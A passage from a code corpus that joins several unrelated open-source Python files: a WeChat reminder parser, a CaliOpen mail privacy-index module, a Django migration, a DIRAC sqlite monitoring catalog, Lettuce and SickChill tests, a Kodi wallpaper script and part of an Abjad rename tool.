"remind_type": "0" }, "intent": "SEARCH" }, "type": "remind" } """ try: wechat_result = wechat_client.semantic.search( query=text, category='remind', city='上海', # F**k, weixin always needs the city param, hard-code one. **kwargs ) except WeChatClientException as e: logger.info('Failed to parse using wechat api ' + str(e)) raise # wechat_result = json.loads(parse_by_wechat_api.__doc__) logger.debug('Semantic result from wechat, %s', json.dumps(wechat_result, ensure_ascii=False)) dt_str = '%s %s+08:00' % ( wechat_result['semantic']['details']['datetime']['date'], wechat_result['semantic']['details']['datetime']['time'], ) # there could be nothing in details dt = parse_datetime(dt_str) return Remind(time=dt, desc=wechat_result.get('query', ''), event=wechat_result['semantic']['details'].get('event', '')) def parse_by_boson(text): pass
s-gogna/JST
mips/configurations.py
# This file is part of JST. # # JST is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # JST is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with JST. If not, see <http://www.gnu.org/licenses/>. # This file was made to prevent circular dependencies, if we can do something better, let's do it import mips.registers as mr SPILL_MEM_LABEL = 'SPILL_MEMORY' SPILL_MEM_SIZE = 64 # bytes TEMPROARY_REGISTER_SET = mr.T_REGISTERS NOT_TESTING_FUNCTIONS = False
CaliOpen/CaliOpen
src/backend/components/py.pi/caliopen_pi/features/mail.py
# -*- coding: utf-8 -*- """Caliopen mail message privacy features extraction methods.""" from __future__ import absolute_import, print_function, unicode_literals import logging import pgpy from caliopen_main.pi.parameters import PIParameter from .helpers.spam import SpamScorer from .helpers.ingress_path import get_ingress_features from .helpers.importance_level import compute_importance from .types import init_features log = logging.getLogger(__name__) TLS_VERSION_PI = { 'tlsv1/sslv3': 2, 'tls1': 7, 'tlsv1': 7, 'tls12': 10, } PGP_MESSAGE_HEADER = '\n-----BEGIN PGP MESSAGE-----' class InboundMailFeature(object): """Process a parsed mail message and extract available privacy features.""" def __init__(self, message, config): """Get a ``MailMessage`` instance and extract privacy features.""" self.message = message self.config = config self._features = init_features('message') def is_blacklist_mx(self, mx): """MX is blacklisted.""" blacklisted = self.config.get('blacklistes.mx') if not blacklisted: return False if mx in blacklisted: return True return False def is_whitelist_mx(self, mx): """MX is whitelisted.""" whitelistes = self.config.get('whitelistes.mx') if not whitelistes: return False if mx in whitelistes: return True return False @property def internal_domains(self): """Get internal hosts from configuration.""" domains = self.config.get('internal_domains') return domains if domains else [] def emitter_reputation(self, mx): """Return features about emitter.""" if self.is_blacklist_mx(mx): return 'blacklisted' if self.is_whitelist_mx(mx): return 'whitelisted' return 'unknown' def emitter_certificate(self): """Get the certificate from emitter.""" return None @property def mail_agent(self): """Get the mailer used for this message.""" # XXX normalize better and more ? return self.message.mail.get('X-Mailer', '').lower() @property def transport_signature(self): """Get the transport signature if any.""" return self.message.mail.get('DKIM-Signature') @property def spam_informations(self): """Return a global spam_score and related features.""" spam = SpamScorer(self.message.mail) return {'spam_score': spam.score, 'spam_method': spam.method, 'is_spam': spam.is_spam} @property def is_internal(self): """Return true if it's an internal message.""" from_ = self.message.mail.get('From') for domain in self.internal_domains: if domain in from_: return True return False def get_signature_informations(self): """Get message signature features.""" signed_parts = [x for x in self.message.attachments if 'pgp-sign' in x.content_type] if not signed_parts: return {} sign = pgpy.PGPSignature() features = {'message_signed': True, 'message_signature_type': 'PGP'} try: sign.parse(signed_parts[0].data) features.update({'message_signer': sign.signer}) except Exception as exc: log.error('Unable to parse pgp signature {}'.format(exc)) return features def get_encryption_informations(self): """Get message encryption features.""" is_encrypted = False if 'encrypted' in self.message.extra_parameters: is_encrypted = True # Maybe pgp/inline ? if not is_encrypted: try: body = self.message.body_plain.decode('utf-8') if body.startswith(PGP_MESSAGE_HEADER): is_encrypted = True except UnicodeDecodeError: log.warn('Invalid body_plain encoding for message') pass return {'message_encrypted': is_encrypted, 'message_encryption_method': 'pgp' if is_encrypted else ''} def _get_features(self): """Extract privacy features.""" features = self._features.copy() received = self.message.headers.get('Received', []) features.update(get_ingress_features(received, self.internal_domains)) mx = features.get('ingress_server') reputation = None if not mx else self.emitter_reputation(mx) features['mail_emitter_mx_reputation'] = reputation features['mail_emitter_certificate'] = self.emitter_certificate() features['mail_agent'] = self.mail_agent features['is_internal'] = self.is_internal features.update(self.get_signature_informations()) features.update(self.get_encryption_informations()) features.update(self.spam_informations) if self.transport_signature: features.update({'transport_signed': True}) return features def _compute_pi(self, participants, features): """Compute Privacy Indexes for a message.""" log.info('PI features {}'.format(features)) pi_cx = {} # Contextual privacy index pi_co = {} # Comportemental privacy index pi_t = {} # Technical privacy index reput = features.get('mail_emitter_mx_reputation') if reput == 'whitelisted': pi_cx['reputation_whitelist'] = 20 elif reput == 'unknown': pi_cx['reputation_unknow'] = 10 known_contacts = [] known_public_key = 0 for part, contact in participants: if contact: known_contacts.append(contact) if contact.public_key: known_public_key += 1 if len(participants) == len(known_contacts): # - Si tous les contacts sont déjà connus le PIᶜˣ # augmente de la valeur du PIᶜᵒ le plus bas des PIᶜᵒ des contacts. contact_pi_cos = [x.pi['comportment'] for x in known_contacts if x.pi and 'comportment' in x.pi] if contact_pi_cos: pi_cx['known_contacts'] = min(contact_pi_cos) if known_public_key == len(known_contacts): pi_co['contact_pubkey'] = 20 ext_hops = features.get('nb_external_hops', 0) if ext_hops <= 1: tls = features.get('ingress_socket_version') if tls: if tls not in TLS_VERSION_PI: log.warn('Unknown TLS version {}'.format(tls)) else: pi_t += TLS_VERSION_PI[tls] if features.get('mail_emitter_certificate'): pi_t['emitter_certificate'] = 10 if features.get('transport_signed'): pi_t['transport_signed'] = 10 if features.get('message_encrypted'): pi_t['encrypted'] = 30 log.info('PI compute t:{} cx:{} co:{}'.format(pi_t, pi_cx, pi_co)) return PIParameter({'technic': sum(pi_t.values()), 'context': sum(pi_cx.values()), 'comportment': sum(pi_co.values()), 'version': 0}) def process(self, user, message, participants): """ Process the message for privacy features and PI compute. :param user: user the message belong to :ptype user: caliopen_main.user.core.User :param message: a message parameter that will be updated with PI :ptype message: NewMessage :param participants: an array of participant with related Contact :ptype participants: list(Participant, Contact) """ features = self._get_features() message.pi = self._compute_pi(participants, features) il = compute_importance(user, message, features, participants) message.privacy_features = features message.importance_level = il
sostenibilidad-unam/posgrado
posgradmin/posgradmin/migrations/0040_auto_20191120_2258.py
# -*- coding: utf-8 -*- # Generated by Django 1.11.13 on 2019-11-21 04:58 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('posgradmin', '0039_auto_20191120_2249'), ] operations = [ migrations.AlterModelOptions( name='profesor', options={'ordering': ['user__first_name', 'user__last_name'], 'verbose_name_plural': 'Profesores'}, ), ]
ic-hep/DIRAC
src/DIRAC/FrameworkSystem/private/monitoring/MonitoringCatalog.py
""" Interacts with sqlite3 db """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import six import sqlite3 import os import hashlib import random import time import DIRAC from DIRAC import gLogger, S_OK, S_ERROR from DIRAC.FrameworkSystem.private.monitoring.Activity import Activity from DIRAC.Core.Utilities import Time class MonitoringCatalog(object): """ This class is used to perform all kinds queries to the sqlite3 database. """ def __init__(self, dataPath): """ Initialize monitoring catalog """ self.dbConn = False self.dataPath = dataPath self.log = gLogger.getSubLogger("ActivityCatalog") self.createSchema() def __connect(self): """ Connects to database """ if not self.dbConn: dbPath = "%s/monitoring.db" % self.dataPath self.dbConn = sqlite3.connect(dbPath, timeout=20, isolation_level=None) # These two settings dramatically increase the performance # at the cost of a small corruption risk in case of OS crash # It is acceptable though, given the nature of the data # details here https://www.sqlite.org/pragma.html c = self.dbConn.cursor() c.execute("PRAGMA synchronous = OFF") c.execute("PRAGMA journal_mode = TRUNCATE") def __dbExecute(self, query, values=False): """ Executes a sql statement. :type query: string :param query: The query to be executed. :type values: bool :param values: To execute query with values or not. :return: the cursor. """ cursor = self.dbConn.cursor() # pylint: disable=no-member self.log.debug("Executing %s" % query) executed = False retry = 0 while not executed and retry < 10: retry += 1 try: if values: cursor.execute(query, values) else: cursor.execute(query) executed = True except Exception as e: self.log.exception("Exception executing statement", "query: %s, values: %s" % (query, values)) time.sleep(random.random()) if not executed: self.log.error("Could not execute query, big mess ahead", "query: %s, values: %s" % (query, values)) return cursor def __createTables(self): """ Creates tables if not already created """ self.log.info("Creating tables in db") try: filePath = "%s/monitoringSchema.sql" % os.path.dirname(__file__) fd = open(filePath) buff = fd.read() fd.close() except IOError as e: DIRAC.abort(1, "Can't read monitoring schema", filePath) while buff.find(";") > -1: limit = buff.find(";") + 1 sqlQuery = buff[:limit].replace("\n", "") buff = buff[limit:] try: self.__dbExecute(sqlQuery) except Exception as e: DIRAC.abort(1, "Can't create tables", str(e)) def createSchema(self): """ Creates all the sql schema if it does not exist """ self.__connect() try: sqlQuery = "SELECT name FROM sqlite_master WHERE type='table';" c = self.__dbExecute(sqlQuery) tablesList = c.fetchall() if len(tablesList) < 2: self.__createTables() except Exception as e: self.log.fatal("Failed to startup db engine", str(e)) return False return True def __delete(self, table, dataDict): """ Executes an sql delete. :type table: string :param table: name of the table. :type dataDict: dictionary :param dataDict: the data dictionary. """ query = "DELETE FROM %s" % table valuesList = [] keysList = [] for key in dataDict: if isinstance(dataDict[key], list): orList = [] for keyValue in dataDict[key]: valuesList.append(keyValue) orList.append("%s = ?" % key) keysList.append("( %s )" % " OR ".join(orList)) else: valuesList.append(dataDict[key]) keysList.append("%s = ?" % key) if keysList: query += " WHERE %s" % (" AND ".join(keysList)) self.__dbExecute("%s;" % query, values=valuesList) def __select(self, fields, table, dataDict, extraCond="", queryEnd=""): """ Executes a sql select. :type fields: string :param fields: The fields required in a string. :type table: string :param table: name of the table. :type dataDict: dictionary :param dataDict: the data dictionary. :return: a list of values. """ valuesList = [] keysList = [] for key in dataDict: if isinstance(dataDict[key], list): orList = [] for keyValue in dataDict[key]: valuesList.append(keyValue) orList.append("%s = ?" % key) keysList.append("( %s )" % " OR ".join(orList)) else: valuesList.append(dataDict[key]) keysList.append("%s = ?" % key) if isinstance(fields, six.string_types): fields = [fields] if len(keysList) > 0: whereCond = "WHERE %s" % (" AND ".join(keysList)) else: whereCond = "" if extraCond: if whereCond: whereCond += " AND %s" % extraCond else: whereCond = "WHERE %s" % extraCond query = "SELECT %s FROM %s %s %s;" % (",".join(fields), table, whereCond, queryEnd) c = self.__dbExecute(query, values=valuesList) return c.fetchall() def __insert(self, table, specialDict, dataDict): """ Executes an sql insert. :type table: string :param table: name of the table. :type specialDict: dictionary :param specialDict: the special dictionary. :type dataDict: dictionary :param dataDict: the data dictionary. :return: the number of rows inserted. """ valuesList = [] valuePoitersList = [] namesList = [] for key in specialDict: namesList.append(key) valuePoitersList.append(specialDict[key]) for key in dataDict: namesList.append(key) valuePoitersList.append("?") valuesList.append(dataDict[key]) query = "INSERT INTO %s (%s) VALUES (%s);" % (table, ", ".join(namesList), ",".join(valuePoitersList)) c = self.__dbExecute(query, values=valuesList) return c.rowcount def __update(self, newValues, table, dataDict, extraCond=""): """ Executes a sql update. :type table: string :param table: name of the table. :type newValues: dictionary :param newValues: a dictionary with new values. :type dataDict: dictionary :param dataDict: the data dictionary. :return: the number of rows updated. """ valuesList = [] keysList = [] updateFields = [] for key in newValues: updateFields.append("%s = ?" % key) valuesList.append(newValues[key]) for key in dataDict: if isinstance(dataDict[key], list): orList = [] for keyValue in dataDict[key]: valuesList.append(keyValue) orList.append("%s = ?" % key) keysList.append("( %s )" % " OR ".join(orList)) else: valuesList.append(dataDict[key]) keysList.append("%s = ?" % key) if len(keysList) > 0: whereCond = "WHERE %s" % (" AND ".join(keysList)) else: whereCond = "" if extraCond: if whereCond: whereCond += " AND %s" % extraCond else: whereCond = "WHERE %s" % extraCond query = "UPDATE %s SET %s %s;" % (table, ",".join(updateFields), whereCond) c = self.__dbExecute(query, values=valuesList) return c.rowcount def registerSource(self, sourceDict): """ Registers an activity source. :type sourceDict: dictionary :param sourceDict: the source dictionary. :return: a list of values. """ retList = self.__select("id", "sources", sourceDict) if len(retList) > 0: return retList[0][0] else: self.log.info("Registering source", str(sourceDict)) if self.__insert("sources", {"id": "NULL"}, sourceDict) == 0: return -1 return self.__select("id", "sources", sourceDict)[0][0] def registerActivity(self, sourceId, acName, acDict): """ Register an activity. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :type acDict: dictionary :param acDict: The activity dictionary containing information about 'category', 'description', 'bucketLength', 'type', 'unit'. :return: a list of values. """ m = hashlib.md5() acDict["name"] = acName acDict["sourceId"] = sourceId m.update(str(acDict).encode()) retList = self.__select("filename", "activities", acDict) if len(retList) > 0: return retList[0][0] else: acDict["lastUpdate"] = int(Time.toEpoch() - 86000) filePath = m.hexdigest() filePath = "%s/%s.rrd" % (filePath[:2], filePath) self.log.info("Registering activity", str(acDict)) # This is basically called by the ServiceInterface inside registerActivities method and then all the activity # information is stored in the sqlite3 db using the __insert method. if ( self.__insert( "activities", { "id": "NULL", "filename": "'%s'" % filePath, }, acDict, ) == 0 ): return -1 return self.__select("filename", "activities", acDict)[0][0] def getFilename(self, sourceId, acName): """ Gets rrd filename for an activity. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :return: The filename in a string. """ queryDict = {"sourceId": sourceId, "name": acName} retList = self.__select("filename", "activities", queryDict) if len(retList) == 0: return "" else: return retList[0][0] def findActivity(self, sourceId, acName): """ Finds activity. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :return: A list containing all the activity information. """ queryDict = {"sourceId": sourceId, "name": acName} retList = self.__select( "id, name, category, unit, type, description, filename, bucketLength, lastUpdate", "activities", queryDict ) if len(retList) == 0: return False else: return retList[0] def activitiesQuery(self, selDict, sortList, start, limit): """ Gets all the sources and activities details in a joined format. :type selDict: dictionary :param selDict: The fields inside the select query. :type sortList: list :param sortList: A list in sorted order of the data. :type start: int :param start: The point or tuple from where to start. :type limit: int :param limit: The number of tuples to select from the starting point. :return: S_OK with a tuple of the result list and fields list. """ fields = [ "sources.id", "sources.site", "sources.componentType", "sources.componentLocation", "sources.componentName", "activities.id", "activities.name", "activities.category", "activities.unit", "activities.type", "activities.description", "activities.bucketLength", "activities.filename", "activities.lastUpdate", ] extraSQL = "" if sortList: for sorting in sortList: if sorting[0] not in fields: return S_ERROR("Sorting field %s is invalid" % sorting[0]) extraSQL = "ORDER BY %s" % ",".join(["%s %s" % sorting for sorting in sortList]) if limit: if start: extraSQL += " LIMIT %s OFFSET %s" % (limit, start) else: extraSQL += " LIMIT %s" % limit # This method basically takes in some condition and then based on those performs SQL Join on the # sources and activities table of the sqlite3 db and returns the corresponding result. retList = self.__select( ", ".join(fields), "sources, activities", selDict, "sources.id = activities.sourceId", extraSQL ) return S_OK((retList, fields)) def setLastUpdate(self, sourceId, acName, lastUpdateTime): """ Updates the lastUpdate timestamp for a particular activity using the source id. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :type lastUpdateTime: string :param lastUpdateTime: The last update time in the proper format. :return: the number of rows updated. """ queryDict = {"sourceId": sourceId, "name": acName} return self.__update({"lastUpdate": lastUpdateTime}, "activities", queryDict) def getLastUpdate(self, sourceId, acName): """ Gets the lastUpdate timestamp for a particular activity using the source id. :type sourceId: string :param sourceId: The source id. :type acName: string :param acName: name of the activity. :return: The last update time in string. """ queryDict = {"sourceId": sourceId, "name": acName} retList = self.__update("lastUpdate", "activities", queryDict) if len(retList) == 0: return False else: return retList[0] def queryField(self, field, definedFields): """ Query the values of a field given a set of defined ones. :type field: string :param field: The field required in a string. :type field: list :param definedFields: A set of defined fields. :return: A list of values. """ retList = self.__select(field, "sources, activities", definedFields, "sources.id = activities.sourceId") return retList def getMatchingActivities(self, condDict): """ Gets all activities matching the defined conditions. :type condDict: dictionary. :param condDict: A dictionary containing the conditions. :return: a list of matching activities. """ retList = self.queryField(Activity.dbFields, condDict) acList = [] for acData in retList: acList.append(Activity(acData)) return acList def registerView(self, viewName, viewData, varFields): """ Registers a new view. :type viewName: string :param viewName: Name of the view. :type viewDescription: dictionary :param viewDescription: A dictionary containing the view description. :type varFields: list :param varFields: A list of variable fields. :return: S_OK / S_ERROR with the corresponding error message. """ retList = self.__select("id", "views", {"name": viewName}) if len(retList) > 0: return S_ERROR("Name for view name already exists") retList = self.__select("name", "views", {"definition": viewData}) if len(retList) > 0: return S_ERROR("View specification already defined with name '%s'" % retList[0][0]) self.__insert( "views", {"id": "NULL"}, {"name": viewName, "definition": viewData, "variableFields": ", ".join(varFields)} ) return S_OK() def getViews(self, onlyStatic): """ Gets views. :type onlyStatic: bool :param onlyStatic: Whether the views required are static or not. :return: A list of values. """ queryCond = {} if onlyStatic: queryCond["variableFields"] = "" return self.__select("id, name, variableFields", "views", queryCond) def getViewById(self, viewId): """ Gets a view for a given id. :type viewId: string :param viewId: The view id. :return: A list of values. """ if isinstance(viewId, six.string_types): return self.__select("definition, variableFields", "views", {"name": viewId}) else: return self.__select("definition, variableFields", "views", {"id": viewId}) def deleteView(self, viewId): """ Deletes a view for a given id. :type viewId: string :param viewId: The view id. """ self.__delete("views", {"id": viewId}) def getSources(self, dbCond, fields=[]): """ Gets souces for a given db condition. :type dbCond: dictionary :param dbCond: The required database conditions. :type fields: list :param fields: A list of required fields. :return: The list of results after the query is performed. """ if not fields: fields = "id, site, componentType, componentLocation, componentName" else: fields = ", ".join(fields) return self.__select(fields, "sources", dbCond) def getActivities(self, dbCond): """ Gets activities given a db condition. :type dbCond: dictionary :param dbCond: The required database conditions. :return: a list of activities. """ return self.__select("id, name, category, unit, type, description, bucketLength", "activities", dbCond) def deleteActivity(self, sourceId, activityId): """ Deletes an activity. :type sourceId: string :param sourceId: The source id. :type activityId: string :param activityId: The activity id. :return: S_OK with rrd filename / S_ERROR with a message. """ acCond = {"sourceId": sourceId, "id": activityId} acList = self.__select("filename", "activities", acCond) if len(acList) == 0: return S_ERROR("Activity does not exist") rrdFile = acList[0][0] self.__delete("activities", acCond) acList = self.__select("id", "activities", {"sourceId": sourceId}) if len(acList) == 0: self.__delete("sources", {"id": sourceId}) return S_OK(rrdFile)
adw0rd/lettuce-py3
tests/functional/test_terrain.py
# -*- coding: utf-8 -*- # <Lettuce - Behaviour Driven Development for python> # Copyright (C) <2010-2012> Gabriel Falcão <gabriel@nacaolivre.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os import subprocess from os.path import dirname, abspath, join, curdir from nose.tools import assert_equals, with_setup from tests.asserts import prepare_stdout def test_imports_terrain_under_path_that_is_run(): old_path = abspath(curdir) os.chdir(join(abspath(dirname(__file__)), 'simple_features', '1st_feature_dir')) status, output = subprocess.getstatusoutput('python -c "from lettuce import world;assert hasattr(world, \'works_fine\'); print \'it passed!\'"') assert_equals(status, 0) assert_equals(output, "it passed!") os.chdir(old_path) @with_setup(prepare_stdout) def test_after_each_all_is_executed_before_each_all(): "terrain.before.each_all and terrain.after.each_all decorators" from lettuce import step from lettuce import Runner from lettuce.terrain import before, after, world world.all_steps = [] @before.all def set_state_to_before(): world.all_steps.append('before') @step('append 1 in world all steps') def append_1_in_world_all_steps(step): world.all_steps.append("1") @step('append 2 more') def append_2_more(step): world.all_steps.append("2") @step('append 3 in world all steps') def append_during_to_all_steps(step): world.all_steps.append("3") @after.all def set_state_to_after(total): world.all_steps.append('after') runner = Runner(join(abspath(dirname(__file__)), 'simple_features', '2nd_feature_dir')) runner.run() assert_equals( world.all_steps, ['before', '1', '2', '3', 'after'] )
Vagab0nd/SiCKRAGE
tests/notifier_tests.py
""" Test notifiers """ import unittest from sickchill.oldbeard import db from sickchill.oldbeard.notifiers.emailnotify import Notifier as EmailNotifier from sickchill.oldbeard.notifiers.prowl import Notifier as ProwlNotifier from sickchill.tv import TVEpisode, TVShow from sickchill.views.home import Home from tests import test_lib as test # noinspection PyProtectedMember class NotifierTests(test.SickChillTestDBCase): """ Test notifiers """ @classmethod def setUpClass(cls): num_legacy_shows = 3 num_shows = 3 num_episodes_per_show = 5 cls.mydb = db.DBConnection() cls.legacy_shows = [] cls.shows = [] # Per-show-notifications were originally added for email notifications only. To add # this feature to other notifiers, it was necessary to alter the way text is stored in # one of the DB columns. Therefore, to test properly, we must create some shows that # store emails in the old method (legacy method) and then other shows that will use # the new method. for show_counter in range(100, 100 + num_legacy_shows): show = TVShow(1, show_counter) show.name = "Show " + str(show_counter) show.episodes = [] for episode_counter in range(0, num_episodes_per_show): episode = TVEpisode(show, test.SEASON, episode_counter) episode.name = "Episode " + str(episode_counter + 1) episode.quality = "SDTV" show.episodes.append(episode) show.saveToDB() cls.legacy_shows.append(show) for show_counter in range(200, 200 + num_shows): show = TVShow(1, show_counter) show.name = "Show " + str(show_counter) show.episodes = [] for episode_counter in range(0, num_episodes_per_show): episode = TVEpisode(show, test.SEASON, episode_counter) episode.name = "Episode " + str(episode_counter + 1) episode.quality = "SDTV" show.episodes.append(episode) show.saveToDB() cls.shows.append(show) def setUp(self): """ Set up tests """ self._debug_spew("\n\r") @unittest.skip('Not yet implemented') def test_boxcar(self): """ Test boxcar notifications """ pass @unittest.skip('Cannot call directly without a request') def test_email(self): """ Test email notifications """ email_notifier = EmailNotifier() # Per-show-email notifications were added early on and utilized a different format than the other notifiers. # Therefore, to test properly (and ensure backwards compatibility), this routine will test shows that use # both the old and the new storage methodology legacy_test_emails = "email-1@address.com,email2@address.org,email_3@address.tv" test_emails = "email-4@address.com,email5@address.org,email_6@address.tv" for show in self.legacy_shows: showid = self._get_showid_by_showname(show.show_name) self.mydb.action("UPDATE tv_shows SET notify_list = ? WHERE show_id = ?", [legacy_test_emails, showid]) for show in self.shows: showid = self._get_showid_by_showname(show.show_name) Home.saveShowNotifyList(show=showid, emails=test_emails) # Now, iterate through all shows using the email list generation routines that are used in the notifier proper shows = self.legacy_shows + self.shows for show in shows: for episode in show.episodes: ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality show_name = email_notifier._parseEp(ep_name) recipients = email_notifier._generate_recipients(show_name) self._debug_spew("- Email Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:") for email in recipients: self._debug_spew("-- " + email.strip()) self._debug_spew("\n\r") return True @unittest.skip('Not yet implemented') def test_emby(self): """ Test emby notifications """ pass @unittest.skip('Not yet implemented') def test_freemobile(self): """ Test freemobile notifications """ pass @unittest.skip('Not yet implemented') def test_growl(self): """ Test growl notifications """ pass @unittest.skip('Not yet implemented') def test_kodi(self): """ Test kodi notifications """ pass @unittest.skip('Not yet implemented') def test_libnotify(self): """ Test libnotify notifications """ pass @unittest.skip('Not yet implemented') def test_nma(self): """ Test nma notifications """ pass @unittest.skip('Not yet implemented') def test_nmj(self): """ Test nmj notifications """ pass @unittest.skip('Not yet implemented') def test_nmjv2(self): """ Test nmjv2 notifications """ pass @unittest.skip('Not yet implemented') def test_plex(self): """ Test plex notifications """ pass @unittest.skip('Cannot call directly without a request') def test_prowl(self): """ Test prowl notifications """ prowl_notifier = ProwlNotifier() # Prowl per-show-notifications only utilize the new methodology for storage; therefore, the list of legacy_shows # will not be altered (to preserve backwards compatibility testing) test_prowl_apis = "11111111111111111111,22222222222222222222" for show in self.shows: showid = self._get_showid_by_showname(show.show_name) Home.saveShowNotifyList(show=showid, prowlAPIs=test_prowl_apis) # Now, iterate through all shows using the Prowl API generation routines that are used in the notifier proper for show in self.shows: for episode in show.episodes: ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality show_name = prowl_notifier._parse_episode(ep_name) recipients = prowl_notifier._generate_recipients(show_name) self._debug_spew("- Prowl Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:") for api in recipients: self._debug_spew("-- " + api.strip()) self._debug_spew("\n\r") return True @unittest.skip('Not yet implemented') def test_pushalot(self): """ Test pushalot notifications """ pass @unittest.skip('Not yet implemented') def test_pushbullet(self): """ Test pushbullet notifications """ pass @unittest.skip('Not yet implemented') def test_pushover(self): """ Test pushover notifications """ pass @unittest.skip('Not yet implemented') def test_pytivo(self): """ Test pytivo notifications """ pass @unittest.skip('Not yet implemented') def test_synoindex(self): """ Test synoindex notifications """ pass @unittest.skip('Not yet implemented') def test_synologynotifier(self): """ Test synologynotifier notifications """ pass @unittest.skip('Not yet implemented') def test_trakt(self): """ Test trakt notifications """ pass @unittest.skip('Not yet implemented') def test_tweet(self): """ Test tweet notifications """ pass @unittest.skip('Not yet implemented') def test_twilio(self): """ Test twilio notifications """ pass @staticmethod def _debug_spew(text): """ Spew text notifications :param text: to spew :return: """ if __name__ == '__main__' and text is not None: print(text) def _get_showid_by_showname(self, showname): """ Get show ID by show name :param showname: :return: """ if showname is not None: rows = self.mydb.select("SELECT show_id FROM tv_shows WHERE show_name = ?", [showname]) if len(rows) == 1: return rows[0]['show_id'] return -1 if __name__ == '__main__': print("==================") print("STARTING - NOTIFIER TESTS") print("==================") print("######################################################################") SUITE = unittest.TestLoader().loadTestsFromTestCase(NotifierTests) unittest.TextTestRunner(verbosity=2).run(SUITE)
shoaibali/kodi.background.rotator
randombackground.py
import os, random rfilename=random.choice(os.listdir("/storage/pictures")) rextension=os.path.splitext(rfilename)[1] picturespath='/storage/pictures/' #TODO Probably dont need a forloop can possibly do random* #TODO What if the directory is empty? for filename in os.listdir(picturespath): if filename.startswith("random"): extension=os.path.splitext(filename)[1] newname=picturespath + str(random.random()).rsplit('.',1)[1] + extension # rename the existing random wallpaper to something random filename=picturespath+filename os.rename(filename, newname) # now rename the newly randomly founded file to be random rfilename=picturespath+rfilename os.rename(rfilename, picturespath+'random'+rextension)
mscuthbert/abjad
abjad/tools/developerscripttools/RenameModulesScript.py
# -*- encoding: utf-8 -*- import os from abjad.tools import documentationtools from abjad.tools import systemtools from abjad.tools.developerscripttools.DeveloperScript import DeveloperScript from abjad.tools.developerscripttools.ReplaceInFilesScript \ import ReplaceInFilesScript class RenameModulesScript(DeveloperScript): r'''Renames classes and functions. Handle renaming the module and package, as well as any tests, documentation or mentions of the class throughout the Abjad codebase: .. shell:: ajv rename --help ''' ### PUBLIC PROPERTIES ### @property def alias(self): r'''Alias of script. Returns ``'rename'``. ''' return 'rename' @property def long_description(self): r'''Long description of script. Returns string or none. ''' return None @property def scripting_group(self): r'''Scripting group of script. Returns none. ''' return None @property def short_description(self): r'''Short description of script. Returns string. ''' return 'Rename public modules.' @property def version(self): r'''Version of script. Returns float. ''' return 1.0 ### PRIVATE METHODS ### def _codebase_name_to_codebase_docs_path(self, codebase): from abjad import abjad_configuration if codebase == 'mainline': return os.path.join( abjad_configuration.abjad_directory, 'docs', 'source', 'api', 'tools', ) elif codebase == 'experimental': return os.path.join( abjad_configuration.abjad_experimental_directory, 'docs', 'source', 'tools', ) message = 'bad codebase name: {!r}.' message = message.format(codebase) raise Exception(message) def _codebase_name_to_codebase_tools_path(self, codebase): from abjad import abjad_configuration if codebase == 'mainline': return os.path.join( abjad_configuration.abjad_directory, 'tools') elif codebase == 'experimental': return os.path.join( abjad_configuration.abjad_experimental_directory, 'tools') message = 'bad codebase name: {!r}.' message = message.format(codebase) raise Exception(message) def _confirm_name_changes(self, old_codebase, old_tools_package_name, old_module_name, new_codebase, new_tools_package_name, new_module_name, ): max_codebase = max(len(old_codebase), len(new_codebase)) old_codebase = old_codebase.ljust(max_codebase) new_codebase = new_codebase.ljust(max_codebase) print('') print('Is ...') print('') print(' [{}] {}.{}()'.format( old_codebase, old_tools_package_name, old_module_name)) print(' ===>') print(' [{}] {}.{}()'.format( new_codebase, new_tools_package_name, new_module_name)) print('') string = raw_input('... correct [yes, no, abort]? ').lower() print('') if string in ('y', 'yes'): return True elif string in ('a', 'abort', 'q', 'quit'): raise SystemExit elif string in ('n', 'no'): return False def _get_object_names(self, kind, codebase, tools_package_name): assert kind in ('class', 'function') tools_path = self._codebase_name_to_codebase_tools_path(codebase) path = os.path.join(tools_path, tools_package_name) if kind == 'class': generator = documentationtools.yield_all_classes( code_root=path, include_private_objects=True, ) elif kind == 'function': generator = documentationtools.yield_all_functions( code_root=path, include_private_objects=True, ) return tuple(sorted(generator, key=lambda x: x.__name__)) def _get_tools_package_names(self, codebase): tools_path = self._codebase_name_to_codebase_tools_path(codebase) names = [] for x in os.listdir(tools_path): if os.path.isdir(os.path.join(tools_path, x)): if not x.startswith(('_', '.')): names.append(x) return tuple(sorted(names)) def _parse_tools_package_path(self, path): from abjad import abjad_configuration if '.' not in path: raise SystemExit tools_package_name, module_name = path.split('.') mainline_tools_directory = os.path.join( abjad_configuration.abjad_directory, 'tools', ) for directory_name in os.listdir(mainline_tools_directory): directory = os.path.join( mainline_tools_directory, directory_name) if not os.path.isdir(directory): continue elif directory_name != tools_package_name: continue return 'mainline', tools_package_name, module_name experimental_tools_directory = os.path.join( abjad_configuration.abjad_experimental_directory, 'tools', ) for directory_name in os.listdir(mainline_tools_directory): directory = os.path.join( experimental_tools_directory, directory_name) if not os.path.isdir(directory): continue elif directory_name != tools_package_name: continue return 'experimental', tools_package_name, module_name raise SystemExit def _rename_old_api_page(self, old_codebase, old_tools_package_name, old_module_name, new_codebase, new_tools_package_name, new_module_name, ): print('Renaming old API page ...') old_docs_path = self._codebase_name_to_codebase_docs_path(old_codebase) new_docs_path = self._codebase_name_to_codebase_docs_path(new_codebase) 